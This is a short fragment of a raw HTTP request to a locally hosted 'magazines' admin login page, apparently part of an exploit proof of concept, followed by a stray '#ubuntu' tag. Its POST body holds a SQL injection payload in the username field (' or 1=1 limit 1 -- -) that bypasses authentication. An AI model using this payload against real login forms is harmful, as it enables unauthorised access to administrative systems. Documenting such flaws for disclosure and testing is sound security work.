    Origin: http://localhost
    Connection: close
    Referer: http://localhost/magazines/admin/login.php
    Cookie: PHPSESSID=863plvf7rpambpkmk2cipijgra
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    
    username='+or+1%3D1+limit+1+--+-%2B&password=aaaa

Tag

#ubuntu